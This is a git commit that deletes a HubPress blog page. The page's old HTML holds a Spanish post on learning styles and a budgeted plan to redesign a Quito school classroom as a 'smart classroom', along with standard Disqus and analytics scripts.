{"commit":"526e671315b6260a07678858646d30aaa61124b1","subject":"Deleted 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","message":"Deleted 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","new_file":"17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","new_contents":"","old_contents":"\n\n\n \n \n\n Estilos de aprendizaje e Innovaci\u00f3n educagiva - Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..<\/title>\n\n <meta name=\"HandheldFriendly\" content=\"True\">\n <meta name=\"MobileOptimized\" content=\"320\">\n <meta name=\"apple-mobile-web-app-capable\" content=\"yes\">\n <meta name=\"apple-mobile-web-app-status-bar-style\" content=\"black-translucent\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, maximum-scale=1\">\n\n <meta name=\"description\" content=\"\">\n\n <meta name=\"twitter:card\" content=\"summary\">\n <meta name=\"twitter:title\" content=\"Estilos de aprendizaje e Innovaci\u00f3n educagiva\">\n <meta name=\"twitter:description\" content=\"\">\n\n <meta property=\"og:type\" content=\"article\">\n <meta property=\"og:title\" content=\"Estilos de aprendizaje e Innovaci\u00f3n educagiva\">\n <meta property=\"og:description\" content=\"\">\n\n <link href=\"\/favicon.ico\" rel=\"shortcut icon\" type=\"image\/x-icon\">\n <link href=\"\/apple-touch-icon-precomposed.png\" rel=\"apple-touch-icon\">\n\n <link rel=\"stylesheet\" type=\"text\/css\" href=\"\/\/marchelo2212.github.io\/themes\/uno\/assets\/css\/uno.css?v=1.0.0\" \/>\n\n <link rel=\"canonical\" href=\"https:\/\/marchelo2212.github.io17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc\" \/>\n \n <meta property=\"og:site_name\" content=\"Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\" \/>\n <meta property=\"og:type\" content=\"article\" \/>\n <meta property=\"og:title\" content=\"Estilos de aprendizaje e Innovaci\u00f3n educagiva\" \/>\n <meta property=\"og:description\" content=\"Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno...\" \/>\n <meta property=\"og:url\" content=\"https:\/\/marchelo2212.github.io17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc\" \/>\n <meta property=\"article:published_time\" content=\"Invalid date\" \/>\n <meta property=\"article:modified_time\" content=\"2016-07-30T18:36:52.013Z\" \/>\n <meta property=\"article:tag\" content=\"e-learning\" \/>\n <meta property=\"article:tag\" content=\"innovaci\u00f3n\" \/>\n <meta property=\"article:tag\" content=\"estilos de aprendizaje\" \/>\n <meta property=\"article:tag\" content=\"TIC\" \/>\n <meta property=\"article:tag\" content=\"educaci\u00f3n\" \/>\n \n <meta name=\"twitter:card\" content=\"summary\" \/>\n <meta name=\"twitter:title\" content=\"Estilos de aprendizaje e Innovaci\u00f3n educagiva\" \/>\n <meta name=\"twitter:description\" content=\"Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno...\" \/>\n <meta name=\"twitter:url\" 
content=\"https:\/\/marchelo2212.github.io17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc\" \/>\n \n <script type=\"application\/ld+json\">\n{\n \"@context\": \"http:\/\/schema.org\",\n \"@type\": \"Article\",\n \"publisher\": \"Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\",\n \"author\": {\n \"@type\": \"Person\",\n \"name\": \"Marcelo Sotaminga\",\n \"image\": \"https:\/\/avatars.githubusercontent.com\/u\/9286299?v=3\",\n \"url\": \"undefined\/author\/undefined\",\n \"sameAs\": null\n },\n \"headline\": \"Estilos de aprendizaje e Innovaci\u00f3n educagiva\",\n \"url\": \"https:\/\/marchelo2212.github.io17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc\",\n \"datePublished\": \"Invalid date\",\n \"dateModified\": \"2016-07-30T18:36:52.013Z\",\n \"keywords\": \"e-learning, innovaci\u00f3n, estilos de aprendizaje, TIC, educaci\u00f3n\",\n \"description\": \"Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno...\"\n}\n <\/script>\n\n <meta name=\"generator\" content=\"Ghost ?\" \/>\n <link rel=\"alternate\" type=\"application\/rss+xml\" title=\"Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\" href=\"https:\/\/marchelo2212.github.io\/rss\" \/>\n <link rel=\"stylesheet\" href=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/8.4\/styles\/default.min.css\">\n\n<\/head>\n<body class=\"post-template tag-e-learning tag-innovacion tag-estilos-de-aprendizaje tag-TIC tag-educacion no-js\">\n\n <span class=\"mobile btn-mobile-menu\">\n <i class=\"icon icon-list btn-mobile-menu__icon\"><\/i>\n <i class=\"icon icon-x-circle btn-mobile-close__icon hidden\"><\/i>\n <\/span>\n\n <header class=\"panel-cover panel-cover--collapsed \" >\n <div class=\"panel-main\">\n \n <div class=\"panel-main__inner panel-inverted\">\n <div class=\"panel-main__content\">\n \n <h1 class=\"panel-cover__title panel-title\"><a href=\"https:\/\/marchelo2212.github.io\" title=\"link to homepage for Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\">Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..<\/a><\/h1>\n <hr class=\"panel-cover__divider\" \/>\n <p class=\"panel-cover__description\">Sitio dedicado a recopilar las cosas que he realizado en algunos lados, para poder tenerlas todas un poco ordenadas, aqu\u00ed encontrar\u00e1s cosas referente a:\n Software Libre - GNU \/ Linux\n Innovaci\u00f3n Educativa\n Ciencia y Tecnolog\u00eda\n Entre otras....\n <\/p>\n <hr class=\"panel-cover__divider panel-cover__divider--secondary\" \/>\n \n <div class=\"navigation-wrapper\">\n \n <nav class=\"cover-navigation cover-navigation--primary\">\n <ul class=\"navigation\">\n <li class=\"navigation__item\"><a href=\"https:\/\/marchelo2212.github.io\/#blog\" title=\"link to Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s.. 
blog\" class=\"blog-button\">Blog<\/a><\/li>\n <\/ul>\n <\/nav>\n \n \n \n <nav class=\"cover-navigation navigation--social\">\n <ul class=\"navigation\">\n \n <!-- Twitter -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/www.facebook.com\/marchelo2212\" title=\"Facebook account\">\n <i class='icon icon-social-facebook'><\/i>\n <span class=\"label\">Facebook<\/span>\n <\/a>\n <\/li>\n \n <!-- Twitter -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/twitter.com\/Marchelo2212\" title=\"Twitter account\">\n <i class='icon icon-social-twitter'><\/i>\n <span class=\"label\">Twitter<\/span>\n <\/a>\n <\/li>\n \n <!-- Google Plus -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/plus.google.com\/u\/0\/+MarceloSotaminga\" title=\"Google+ account\">\n <i class='icon icon-social-google-plus'><\/i>\n <span class=\"label\">Google-plus<\/span>\n <\/a>\n <\/li>\n \n \n \n \n \n <!-- LinkedIn -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/ec.linkedin.com\/in\/marcelo-sotaminga-9ab64562\" title=\"LinkedIn account\">\n <i class='icon icon-social-linkedin'><\/i>\n <span class=\"label\">LinkedIn<\/span>\n <\/a>\n <\/li>\n \n <!-- Email -->\n <li class=\"navigation__item\">\n <a href=\"mailto:marcelo@openmailbox.org\" title=\"Email marcelo@openmailbox.org\">\n <i class='icon icon-mail'><\/i>\n <span class=\"label\">Email<\/span>\n <\/a>\n <\/li>\n \n <\/ul>\n <\/nav>\n \n \n <\/div>\n \n <\/div>\n \n <\/div>\n \n <div class=\"panel-cover--overlay\"><\/div>\n <\/div>\n <\/header>\n\n <div class=\"content-wrapper\">\n <div class=\"content-wrapper__inner\">\n \n\n <article class=\"post-container post-container--single\">\n\n <header class=\"post-header\">\n <div class=\"post-meta\">\n <time datetime=\"Invalid date\" class=\"post-meta__date date\">Invalid date<\/time> • <span class=\"post-meta__tags tags\">on <a href=\"https:\/\/marchelo2212.github.io\/tag\/e-learning\">e-learning<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/innovacion\"> innovaci\u00f3n<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/estilos-de-aprendizaje\"> estilos de aprendizaje<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/TIC\">TIC<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/educacion\"> educaci\u00f3n<\/a><\/span>\n <span class=\"post-meta__author author\"><img src=\"https:\/\/avatars.githubusercontent.com\/u\/9286299?v=3\" alt=\"profile image for Marcelo Sotaminga\" class=\"avatar post-meta__avatar\" \/> by Marcelo Sotaminga<\/span>\n <\/div>\n <h1 class=\"post-title\">Estilos de aprendizaje e Innovaci\u00f3n educagiva<\/h1>\n <\/header>\n\n <section class=\"post tag-e-learning tag-innovacion tag-estilos-de-aprendizaje tag-TIC tag-educacion\">\n <div id=\"preamble\">\n<div class=\"sectionbody\">\n<div class=\"paragraph\">\n<p>Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno de ellos.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>1.<a href=\"#fase1\">[fase1]<\/a><br>\n<<#presupuesto,Presupuesto>><br>\n<a href=\"#Presupuesto\">[Presupuesto]<\/a><\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Learn how to <a href=\"#link-macro-attributes\">use attributes within the link macro<\/a>.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>efer to <a href=\"document-b.html#section-b\">Section B<\/a> for more information.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<div 
class=\"sect1\">\n<h2 id=\"__a_href_fase_1_fase_1_a_dise_o_de_una_aula_smart_classroom\"><a href=\"#Fase 1\">[Fase 1]<\/a>: Dise\u00f1o de una aula smart classroom<\/h2>\n<div class=\"sectionbody\">\n<div class=\"paragraph\">\n<p>La educaci\u00f3n del siglo XXI se ha visto inmersa por los grandes cambios sociales que se han suscitado por la implementaci\u00f3n de las TICs en las diversas actividades del ser humano, esto ha obligado al surgimiento de cambios en el c\u00f3mo, donde, con qui\u00e9n, y con qu\u00e9 se hacen diversas\ncosas u actividades.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>En el sector de la educaci\u00f3n se ha dado la apertura para de creaci\u00f3n de nuevos recursos did\u00e1cticos, en los que un factor com\u00fan es el uso de la tecnolog\u00eda, por ende han surgido nuevos teor\u00edas, modelos o visiones del aprendizaje como son el conectivismo, flipped classroom, gamificaci\u00f3n,mlearning, learning analytics entre otras, todas buscando lograr un mejor aprendizaje en el estudiante donde la tecnolog\u00eda, la pedagog\u00eda y el conocimiento se mezclen de tal manera que generen aprendizajes significativos y colaborativos para todos los participantes.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>As\u00ed mismo debido al uso masivo de las TICs han aparecido nuevas competencias digitales, tipos de aprendizaje, formas de aprendizaje, etc, es as\u00ed que el docente ha necesitado responderdiversas exigencias como el manejo de la tecnolog\u00eda, la pedagog\u00eda y el conocimiento del contenido (Modelo TPACK) y con ello han surgido nuevas necesidades dentro de los espacios donde se genera el proceso de ense\u00f1anza \u2013 aprendizaje.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>El presente proyecto de aula promver\u00e1 un trabajo colaborativo dentro de todos los integrantes un aula de clases, desarrollar\u00e1 la creatividad de los estudiantes y promover\u00e1 el liderazgo de cada uno de ellos, se lo ha dise\u00f1ado de tal manera que se logren emplear metodolog\u00edas educativas innovadoras y distruptivas en las que se pueda sacar el mayor provecho de las capacidades de los estudiantes, la metodolog\u00eda y el ambiente f\u00edsico.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>En vista que dentro del aula de clases se desarrolar\u00e1n la mayor\u00eda de actividades acad\u00e9micas se ha buscado el lograr un espacio f\u00edsico que facilite la interacci\u00f3n con las personas de una forma acogedora, pero a la vez, tambi\u00e9n nos permita generar conocimiento de una forma democr\u00e1tica y asimilar el mismo de igual manera.<\/p>\n<\/div>\n<div class=\"sect2\">\n<h3 id=\"_contextualizaci_n\">Contextualizaci\u00f3n<\/h3>\n<div class=\"paragraph\">\n<p>La Unidad Educativa \"Milenio\", esta ubicada al norte de la ciudad Quito, capital de Ecuador, cuenta con un cuerpo docente de 38 docentes para las diferentes \u00e1reas del conocimiento, oferta un bachillerato unificado en ciencias y tambi\u00e9n se encuetra entre las unidades educativas con capacidad de ofertar un Bachillerato Internacional.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Esta propuesta de proyecto esta dirigida a estudiantes de nivel secundario del primer a\u00f1os de bachillerato, entre los 15 y 16 a\u00f1os de edad, para trabajar la asignatura de emprendimiento y gesti\u00f3n; el espacio f\u00edsico tiene las dimensiones 16m de largo por 8 de ancho, cuenta con energ\u00eda el\u00e9ctrica, red inal\u00e1mbrica interna y conexi\u00f3n a internet con uan velocidad de 10mbps.<\/p>\n<\/div>\n<div 
class=\"paragraph\">\n<p>Este espacio f\u00edsico se lo contruy\u00f3 con las siguientes caracter\u00edsticas:<\/p>\n<\/div>\n<div class=\"ulist\">\n<ul>\n<li>\n<p>Puerta estilo francesa.<\/p>\n<\/li>\n<li>\n<p>Ventanales de 3m en cada pared<\/p>\n<\/li>\n<li>\n<p>V\u00eddrios templado transparentes<\/p>\n<\/li>\n<li>\n<p>Multiples tomas correinte tanto en paredes como techo.<\/p>\n<\/li>\n<li>\n<p>Pizarra para marcador l\u00edquido<\/p>\n<\/li>\n<li>\n<p>Muebl\u00e9s st\u00e1ndar de clase (sella y mesas individual) estudiante.<\/p>\n<\/li>\n<li>\n<p>Escritio y silla para el docente.<\/p>\n<\/li>\n<li>\n<p>Libreros, casilleros para los estudiantes<\/p>\n<\/li>\n<li>\n<p>Proyector<\/p>\n<\/li>\n<li>\n<p>Sistema de audio (parlantes)<\/p>\n<\/li>\n<li>\n<p>Un computador para el docente con sistema windows 8.1<\/p>\n<\/li>\n<\/ul>\n<\/div>\n<div class=\"paragraph\">\n<p>De esta manera este espacio posee las car\u00e1cter\u00edsitcas comunes al compararla con otras aulas de clase de la instituci\u00f3n; sin embargo gracias a la gesti\u00f3n realizada por parte de las autoridades se ha logrado un fondo de 3200 usd, para la aducaci\u00f3n de este espacio y tranformarlo en una smarth class acorde las necesidades de la misma y posibilidades ya existentes.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>De esta manera el actual proyecto propone un redise\u00f1o interno del aula de clase y una optimizaci\u00f3n del espacio, buscando el mejorar el desempe\u00f1o de cada participate del proceso<\/p>\n<\/div>\n<div class=\"sect3\">\n<h4 id=\"_transformando_el_aula_de_clase_a_una_smarth_classroom\">Transformando el aula de clase a una Smarth ClassRoom<\/h4>\n<div class=\"paragraph\">\n<p>Al querer tranformar este espacio es necesario buscar una integracion del espacio con la tecnolog\u00eda, acorde lo mencionado por Gros, 2000 y 2004;\nHutchings y Standley, (2000) donde defienden, a partir de sus ideas y reflexiones, que en una smart classroom deber\u00eda asociarse<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p><em>\u201c…​ una integraci\u00f3n invisible de la tecnolog\u00eda en el espacio de aprendizaje.\u201d<\/em><\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Debtro de una smarth Classroom se busca la intersecci\u00f3n de tres elementos que interact\u00faan en el dise\u00f1o del espacio de aprendizaje:<\/p>\n<\/div>\n<div class=\"olist arabic\">\n<ol class=\"arabic\">\n<li>\n<p>El dise\u00f1o arquitect\u00f3nico y la ergonom\u00eda del aula, poseer mobiliario e\ninstrumentos que faciliten el trabajo dentro del aula, la creatividad y colaboraci\u00f3n.<\/p>\n<\/li>\n<li>\n<p>La integraci\u00f3n de la tecnolog\u00eda de manera: funcional, invisible, justificada e\nintensiva<\/p>\n<\/li>\n<li>\n<p>Una metodolog\u00eda did\u00e1ctica: innovadora, disruptiva y oblicua; adecuada a este\nespacio con la finalidad de hacer m\u00e1s eficiente y satisfactorio el proceso de\naprendizaje.<\/p>\n<\/li>\n<\/ol>\n<\/div>\n<div class=\"paragraph\">\n<p>Para poder considerarse una Smart classroom necesariamente deber\u00e1 poseer ciertas\ncaracter\u00edsticas did\u00e1cticas como son:<br><\/p>\n<\/div>\n<div class=\"ulist\">\n<ul>\n<li>\n<p>Flexibilidad en la estructura f\u00edsica<\/p>\n<\/li>\n<li>\n<p>Adaptabilidad<\/p>\n<\/li>\n<li>\n<p>Confortabilidad<\/p>\n<\/li>\n<li>\n<p>Riqueza y variabilidad<\/p>\n<\/li>\n<li>\n<p>Conectividad<\/p>\n<\/li>\n<li>\n<p>Personalizaci\u00f3n<\/p>\n<\/li>\n<\/ul>\n<\/div>\n<div class=\"paragraph\">\n<p>Por todo esto se ha planteado el siguiente plano de la clase en la que se pueden 
evidenciar los cambios que se necesitrar\u00edan.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p><span class=\"image center\"><img src=\"https:\/\/dl.dropboxusercontent.com\/u\/82435380\/Tutorias%20Marcelo\/clase.jpg\" alt=\"interaprendizaje\" width=\"600\"><\/span><\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>De esta manera los cambios que se realizar\u00e1n son los siguientes:<\/p>\n<\/div>\n<div class=\"ulist\">\n<ul>\n<li>\n<p>Aula cuenta con una PDI (Pizarra Digital Interactiva), de bajo costo, ya que se la realizo con el proyecto de Jonny Lee Chunlee,<\/p>\n<\/li>\n<li>\n<p>Usar sistema operativos GNU\/Linux Edubuntu, ya que posee gran cantidad de software educativo did\u00e1ctivo.<\/p>\n<\/li>\n<li>\n<p>Incorporar mesas para trabajo grupal<\/p>\n<\/li>\n<li>\n<p>Agregar computadores, core I3 con sistema operativo Edubunto<\/p>\n<\/li>\n<li>\n<p>Incorporar tablets<\/p>\n<\/li>\n<li>\n<p>Generar un espacios que promuevan la creatividad y el trabajo colaborativo.<\/p>\n<\/li>\n<\/ul>\n<\/div>\n<div class=\"paragraph\">\n<p>Se ha planeado para realizar trabajado en grupos de 4 estudiantes, en el caso de ser m\u00e1s se podr\u00e1n dar uso a puf ubicados alrededor, se cuenta con dos \u00e1reas bien limitadas, el \u00e1rea \"acad\u00e9mcia\", donde se realiz\u00e1 en su mayor\u00eda el proceso de ense\u00f1ana aprendizaje guiada por el docente\/facilitador y el segundo \"recreativo\"donde se podr\u00e1 continuar con este proceso de una manera menos formal y m\u00e1s libre.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Se ha generado estos espacios con el fin de que el estudiante logre identificar cada \u00e1rea y que logre trabajar de diferente manera en cada una, es decir, en el \u00e1rea \"acad\u00e9mica\" se busca dirigir la atenci\u00f3n a que el estudiante comprenda las directrices planteadas y\/o conocimiento s necesarios para realizar las actividades.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Por otro lado en el \u00e1rea recreativa el estudiante podr\u00e1 relajarse y sentirse libres el la convivencia con sus compa\u00f1eros,interactuando y trabajando colaborativamente desde diversos puntos de esta \u00e1rea.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>tambi\u00e9n se han ubicado \u00e1reas para la ubicaci\u00f3n de materiales del estudiante (pertenencias) y otro de materiales del Aula (Librero, armario), as\u00ed mismo se ha instalado una impresora inal\u00e1mbrica para poder tener impreso o imprimir cualquier documentaci\u00f3n que se necesite.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Tambi\u00e9n se cuenta con una mesa principal que permitir\u00e1 tener un espacio para trabajar entre todos, as\u00ed cada estudiante podr\u00e1 construir su conocimiento y aportar al del resto y esto facilitar\u00e1 la flexi\u00f3n, an\u00e1lisis y s\u00edntesis de toda la informaci\u00f3n\/concimeinto y resolver infinidad de retos.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>El docente\/facilitador cuenta con su espacio ubicado de tal manera que le sea f\u00e1cil dirigirse al grupo y verificar el desarrollo de las actividades o planificar las mismas. 
Una las de las car\u00e1cter\u00edsitcas de todo el inmobiliario es que puede desplazarse con facilidad, ya que posee ruedas en cada pata.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Para visializar en 3D esta aula por favor visite este link:<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p><a href=\"http:\/\/floorplanner.com\/projects\/37242114-smarthclassroom\/#details\" target=\"_blank\">mapa 3D Smarth ClassRoom<\/a><\/p>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"sect2\">\n<h3 id=\"__a_href_presupuesto_presupuesto_a\"><a href=\"#presupuesto\">Presupuesto<\/a><\/h3>\n<div class=\"paragraph\">\n<p>Es necesario dar todo el uso posible al inmobiliario ya existe al igual que a la tecnolog\u00eda que posee ya el aula de clase por ello se propone:<\/p>\n<\/div>\n<table class=\"tableblock frame-all grid-all\">\n<caption class=\"title\">Table 1. Tabla de presupuesto<\/caption>\n<colgroup>\n<col>\n<col>\n<col>\n<col>\n<\/colgroup>\n<thead>\n<tr>\n<th class=\"tableblock halign-left valign-top\">Cantidad<\/th>\n<th class=\"tableblock halign-left valign-top\">Descripci\u00f3n<\/th>\n<th class=\"tableblock halign-left valign-top\">Valor Individual<\/th>\n<th class=\"tableblock halign-left valign-top\">Valor Total<\/th>\n<\/tr>\n<\/thead>\n<tfoot>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><\/td>\n<td class=\"tableblock halign-left valign-top\"><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Total<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">3274<\/p><\/td>\n<\/tr>\n<\/tfoot>\n<tbody>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">16<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Sillas giratorias<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">20<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">320<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">4<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Mesas para trabajo grupal 6 personas<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">70<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">280<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">5<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Laptos Core I3<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">250<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">1250<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">5<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Tablets<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">100<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">500<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">2<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Sofas<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">130<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">260<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p 
class=\"tableblock\">8<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Puf \u2013 cojines<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">15<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">120<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">1<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Mesa grupal grande<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">130<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">130<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">1<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Impresora multifunci\u00f3n (copiadora, escanner e impresota)<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">150<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">150<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">2<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Alfombras<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">120<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">240<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">1<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Dispensador de agua caliente\/fria<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">24<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">24<\/p><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<div class=\"admonitionblock note\">\n<table>\n<tr>\n<td class=\"icon\">\n<i class=\"fa icon-note\" title=\"Note\"><\/i>\n<\/td>\n<td class=\"content\">\nEste valor de 3274 d\u00f3lares es el cambio del euro (3000) a dolar.\n<\/td>\n<\/tr>\n<\/table>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n <\/section>\n\n <\/article>\n\n \n <section class=\"post-comments\">\n <div id=\"disqus_thread\"><\/div>\n <script type=\"text\/javascript\">\n var disqus_shortname = 'marchelo2212'; \/\/ required: replace example with your forum shortname\n \/* * * DON'T EDIT BELOW THIS LINE * * *\/\n (function() {\n var dsq = document.createElement('script'); dsq.type = 'text\/javascript'; dsq.async = true;\n dsq.src = '\/\/' + disqus_shortname + '.disqus.com\/embed.js';\n (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);\n })();\n <\/script>\n <noscript>Please enable JavaScript to view the <a href=\"http:\/\/disqus.com\/?ref_noscript\">comments powered by Disqus.<\/a><\/noscript>\n <a href=\"http:\/\/disqus.com\" class=\"dsq-brlink\">comments powered by <span class=\"logo-disqus\">Disqus<\/span><\/a>\n <\/section>\n \n\n\n\n <footer class=\"footer\">\n <span class=\"footer__copyright\">© 2016. 
All rights reserved.<\/span>\n <span class=\"footer__copyright\"><a href=\"http:\/\/uno.daleanthony.com\" title=\"link to page for Uno Ghost theme\">Uno theme<\/a> by <a href=\"http:\/\/daleanthony.com\" title=\"link to website for Dale-Anthony\">Dale-Anthony<\/a><\/span>\n <span class=\"footer__copyright\">Proudly published with <a href=\"http:\/\/hubpress.io\" title=\"link to Hubpress website\">Hubpress<\/a><\/span>\n <\/footer>\n <\/div>\n <\/div>\n\n <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/jquery\/2.1.3\/jquery.min.js?v=\"><\/script> <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/moment.js\/2.9.0\/moment-with-locales.min.js?v=\"><\/script> <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/8.4\/highlight.min.js?v=\"><\/script> \n <script type=\"text\/javascript\">\n jQuery( document ).ready(function() {\n \/\/ change date with ago\n jQuery('ago.ago').each(function(){\n var element = jQuery(this).parent();\n element.html( moment(element.text()).fromNow());\n });\n });\n\n hljs.initHighlightingOnLoad(); \n <\/script>\n\n <script type=\"text\/javascript\" src=\"\/\/marchelo2212.github.io\/themes\/uno\/assets\/js\/main.js?v=1.0.0\"><\/script>\n \n <script>\n (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){\n (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),\n m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)\n })(window,document,'script','\/\/www.google-analytics.com\/analytics.js','ga');\n\n ga('create', 'UA-70778105-1', 'auto');\n ga('send', 'pageview');\n\n <\/script>\n\n<\/body>\n<\/html>\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} 